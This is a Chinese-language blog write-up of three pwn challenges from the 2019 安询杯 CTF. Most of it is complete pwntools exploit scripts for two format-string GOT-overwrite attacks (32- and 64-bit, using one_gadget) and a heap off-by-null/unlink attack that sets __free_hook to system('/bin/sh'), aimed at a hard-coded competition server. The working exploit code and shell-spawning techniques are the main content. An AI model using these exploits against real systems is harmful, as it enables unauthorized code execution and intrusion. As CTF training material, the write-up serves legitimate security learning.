
CTF-安询杯-19年12月

安询杯 PWN WP

前言:做项目做到凌晨3点,9点被拉起来打比赛可还行,然后竟然还续到了晚上9点,我飞仙了

0x1 fmt32 | SOLVED | working : 咲夜南梦


leak 脚本直接用 wiki 上的格式化字符串任意读脚本就好了(原理和下面脚本里 `%9$s` + 地址的用法一样),逐段读取内存就能把程序 dump 成文件,拿到 GOT 表的布局。

然后分析各个 call 的 GOT 表项分别对应哪个函数,这一步主要靠猜:把泄露出来的 GOT 内容和 libc 里候选函数的偏移对一下(libc 基址按页对齐,所以地址的低 12 位必须一致),就能验证猜测是否正确。找到正确的函数、算出 libc 基址之后,把 printf 的 GOT 表项改成 one_gadget 地址即可拿到 shell;注意 one_gadget 各有寄存器/栈的约束条件(见脚本里的注释),第一个不成功就换下一个。

##coding=utf8
from pwn import *
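context.log_level = 'debug'
ip = "47.108.135.45"
port = 20023
sh = remote(ip, port)
lib = ELF("libc.so.6")
# one_gadget output for the challenge's 32-bit libc.  Each gadget only works
# when its constraints hold at the moment printf@got is called, so if the
# first entry of one_gadget below does not pop a shell, retry with the next.
'''
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5f065 execl("/bin/sh", eax)
constraints:
esi is the GOT address of libc
eax == NULL
0x5f066 execl("/bin/sh", [esp])
constraints:
esi is the GOT address of libc
[esp] == NULL
'''
# GOT slots of the target binary.  Per the write-up, the slot at 0x804A014
# was guessed to be printf and confirmed against the libc offsets.
printf_got = 0x804A014
sprintf_got = 0x804A030
# Hard-coded offsets of printf and system in the challenge libc; they must
# come from the same build as libc.so.6 above and the one_gadget list below.
PRINTF_OFF = 0x049020
SYSTEM_OFF = 0x03a940


def leak_dword(addr):
    """Return the 4 bytes at *addr* via the ``%9$s`` arbitrary-read primitive.

    Layout: 5 bytes of format string, then the address, which lands in the
    4-byte argument slot read by ``%9$s``.  The service echoes the expanded
    string after a "Repeater:" prefix, so the next 4 bytes on the wire are
    the raw GOT entry (this assumes the pointer contains no NUL byte).
    """
    sh.sendlineafter('me:', "%9$sA" + p32(addr))
    sh.recvuntil('Repeater:')
    return u32(sh.recv(4))


printf = leak_dword(printf_got)
libc = printf - PRINTF_OFF
system = libc + SYSTEM_OFF
# Two extra leaks that are only logged; handy for cross-checking the libc guess.
__libc_start_main = leak_dword(printf_got + 4 * 5)
sprintf = leak_dword(sprintf_got)
one_gadget = [0x3a80c, 0x3a80e, 0x3a812, 0x3a819, 0x5f065, 0x5f066]
log.success("sprintf: " + hex(sprintf))
log.success("__libc_start_main: " + hex(__libc_start_main))
log.success("printf: " + hex(printf))
log.success("system: " + hex(system))
log.success("libc: " + hex(libc))
# Overwrite printf@got byte by byte with the first one_gadget.  The 5-byte
# prefix keeps fmtstr_payload's own data in slot 9, exactly like the leaks
# above; numbwritten = len("Repeater:") + len(prefix) = 9 + 5 = 0xe is the
# number of characters printf has already emitted before the %n writes count.
payload = 'aaaaa'
payload += fmtstr_payload(9, {printf_got: one_gadget[0] + libc}, write_size="byte", numbwritten=0xe)
sh.sendlineafter("me:", payload)
sh.interactive()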

0x2 fmt64 | SOLVED | working : 咲夜南梦


nc 过去发现交互数据和 fmt32 一样,所以猜测是同一份源码编译成了 32 位和 64 位两个程序。用上面的脚本 dump 一下内存,再用 IDA 分析,可以得到 sprintf 的 GOT 地址,之后利用 one_gadget 拿到 shell,思路和 fmt32 一样。区别在于 64 位地址高位是 0,不能放在格式串前面(printf 遇到 NUL 就会停止),所以脚本里把地址放在格式串后面,并且用两次 %hn 分别写 GOT 表项的低两个字节和次低两个字节。

from pwn import *
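ip = "47.108.135.45"
port = 20023
sprintf_got = 0x601058
# one_gadget offsets for the challenge libc.  Each has its own register/stack
# constraints, so try the next entry if the first one does not spawn a shell.
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# The service prints "Repeater:" before expanding our format string, so the
# %n-style writes start counting from 9 characters, not from 0.
ECHO_PREFIX_LEN = 9


def hn_write_chain(target, prefix_len=ECHO_PREFIX_LEN, lo_index=12, hi_index=13):
    """Build the two ``%hn`` writes that store the low 32 bits of *target*.

    The first write sets the low 16 bits through argument slot *lo_index*,
    the second the next 16 bits through slot *hi_index* (the caller places
    ``addr`` and ``addr + 2`` in those slots).  Counts are reduced modulo
    2**16, so any target works; the plain ``(hi - lo)`` form produced a
    negative, invalid width whenever the upper half was smaller than the
    lower half.  ``%0c`` still emits one character, so a zero delta is
    replaced by a full 0x10000 wrap.

    Args:
        target: address whose low 32 bits are written.
        prefix_len: characters already printed before the chain expands.
        lo_index, hi_index: printf argument slots holding the two addresses.

    Returns:
        The format-string fragment, at most 26 bytes.
    """
    lo = target & 0xffff
    hi = (target >> 16) & 0xffff
    first = (lo - prefix_len) % 0x10000 or 0x10000
    second = (hi - lo) % 0x10000 or 0x10000
    return ('%' + str(first) + 'c%' + str(lo_index) + '$hn'
            + '%' + str(second) + 'c%' + str(hi_index) + '$hn')


def main():
    """Leak libc through sprintf@got, then redirect sprintf to a one_gadget."""
    context.log_level = 'debug'
    sh = remote(ip, port)
    lib = ELF("libc.so.6")
    # 64-bit pointers contain NUL bytes, so the address goes after the
    # specifiers: 8 bytes of format string put it in argument slot 9.
    payload = '%9$sAAAA' + p64(sprintf_got)
    sh.sendlineafter(":", payload)
    # Userspace libc pointers end in 0x7f; keep the 6 significant bytes.
    sprintf = u64(sh.recvuntil("\x7f")[-6:].ljust(8, '\x00'))
    libc = sprintf - lib.symbols['sprintf']
    system = libc + lib.symbols['system']
    target = libc + one_gadget[0]
    log.success("libc: " + hex(libc))
    log.success("system: " + hex(system))
    log.success("one_gadget target: " + hex(target))
    # Rewrite the low 32 bits of sprintf@got; the upper bytes already hold
    # the libc prefix.  The trailing %12$s reads the entry back for checking.
    payload = hn_write_chain(target) + '%12$s'
    # Slot 9 sits at offset 8 of our input and there is one slot per 8 bytes,
    # so padding to 0x20 puts the two addresses in slots 12 and 13.  Worst
    # case the chain plus %12$s is 31 bytes, so it always fits the padding.
    payload = payload.ljust(0x20, '\x00')
    payload += p64(sprintf_got) + p64(sprintf_got + 2)
    sh.sendlineafter(":", payload)
    addr = u64(sh.recvuntil("\x7f")[-6:].ljust(8, '\x00'))
    if addr != target:
        log.warning("sprintf@got reads back as " + hex(addr) + ", expected " + hex(target))
    # The next call through sprintf@got lands in the gadget.
    sh.interactive()


if __name__ == "__main__":
    main()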

0x3 heap | SOLVED | working : 咲夜南梦


典型的 off-by-null + unlink:程序开头的 printf 存在格式化字符串漏洞,用 %p 同时泄露 PIE 基址和 libc 基址;然后用 off-by-null 把下一个 chunk 的 prev_inuse 位清零并伪造 prev_size 和 fd/bk,free 时触发 unlink,使 chunk_list[0] 指向 chunk_list 自身附近;再通过 edit 把 chunk_list 里的指针改成 __free_hook - 8,写入 "/bin/sh" 和 system 地址,最后 free 一下即可拿到 shell。

# -*- coding: utf-8 -*-
from pwn import *
# Pwntools defaults for the whole script: amd64 target, verbose I/O tracing.
context.update(arch="amd64", log_level="debug")
# Challenge binary; the chunk_list offset used in pwn() is relative to its base.
elf = ELF("pwn1")
# Filled in by pwn(): the libc ELF and the I/O tube shared with its helpers.
lib = sh = 0
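def pwn(ip, port, debug):
    """Off-by-null -> unlink -> __free_hook exploit for pwn1.

    Args:
        ip, port: remote target, used when *debug* is not 1.
        debug: 1 runs ./pwn1 locally against the system libc; anything else
            connects to ip:port and uses the shipped libc-2.23.so.

    Ends in sh.interactive() and does not return normally.
    """
    global lib
    global sh
    if debug == 1:
        sh = process("./pwn1")
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        sh = remote(ip, port)
        lib = ELF("libc-2.23.so")

    # Menu wrappers; every prompt ends with ":" so that is the only sync point.
    def add(idx, size, content):
        sh.sendlineafter(":", "1")
        sh.sendlineafter(":", str(idx))
        sh.sendlineafter(":", str(size))
        sh.sendlineafter(":", content)

    def edit(idx, content):
        sh.sendlineafter(":", "4")
        sh.sendlineafter(":", str(idx))
        sh.sendlineafter(":", content)

    def free(idx):
        sh.sendlineafter(":", "2")
        sh.sendlineafter(":", str(idx))

    # Offset of the chunk bookkeeping table inside the PIE binary.
    chunk_list = 0x202060

    # Stage 1: the greeting echoes our name through printf, so %p leaks two
    # pointers: slot 14 is a binary address (0x1200 past the PIE base in the
    # debug run the constant was taken from) and slot 2 is a libc address that
    # empirically sits 0x30 bytes before __malloc_initialize_hook.
    payload = '%14$pAA%2$pB'
    sh.sendlineafter(":", payload)
    sh.recvuntil("Hello, ")
    pie = int(sh.recvuntil("AA", True), 16) - 0x1200
    libc = int(sh.recvuntil("B", True), 16) - lib.symbols['__malloc_initialize_hook'] + 0x30
    __free_hook = libc + lib.symbols['__free_hook']
    system = libc + lib.symbols['system']

    # Stage 2: chunk 0 (0x90) is directly followed by chunk 1 (0x100); chunk 2
    # presumably keeps chunk 1 away from top so free(1) consolidates backwards.
    add(0, 0x88, '\x11' * 0x87)
    add(1, 0xF8, '\x12' * 0xF7)
    add(2, 0x18, '\x13' * 0x17)
    free(0)
    # Fake free chunk at the start of chunk 0's user data (size 0x80), with
    # fd/bk chosen so unlink's FD->bk == P and BK->fd == P checks both read
    # chunk_list[0], which holds exactly this pointer.
    payload = p64(0) + p64(0x81) + p64(pie + chunk_list - 0x18) + p64(pie + chunk_list - 0x10)
    payload = payload.ljust(0x80, '\x00')
    payload += p64(0x80)  # prev_size of chunk 1 -> points back at the fake chunk
    # Writing the full 0x88 bytes lets the off-by-null clear the low byte of
    # chunk 1's size (0x101 -> 0x100), so chunk 1 believes its predecessor is free.
    add(0, 0x88, payload)
    free(1)
    # unlink stores FD into BK->fd last, so chunk_list[0] == chunk_list - 0x18
    # and editing index 0 now rewrites the table itself.  Skip 3 qwords to
    # reach chunk_list[0] and point entries 0 and 1 at __free_hook - 8 (the
    # 0x100 values look like a per-entry size field -- confirm in the binary).
    payload = p64(0) * 3 + p64(__free_hook - 8) + p64(0x100)
    payload += p64(__free_hook - 8) + p64(0x100)
    edit(0, payload)
    # "/bin/sh" lands at __free_hook - 8 and system at __free_hook, so
    # free(0) calls __free_hook(ptr) == system("/bin/sh").
    edit(0, '/bin/sh\x00' + p64(system))
    free(0)
    sh.interactive()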
if __name__ == "__main__":
    # Remote run against the competition instance; pass debug=1 for a local ./pwn1.
    pwn(ip="47.108.135.45", port=20023, debug=0)
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/12/01/CTF-%E5%AE%89%E8%AF%A2%E6%9D%AF-19%E5%B9%B412%E6%9C%88/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
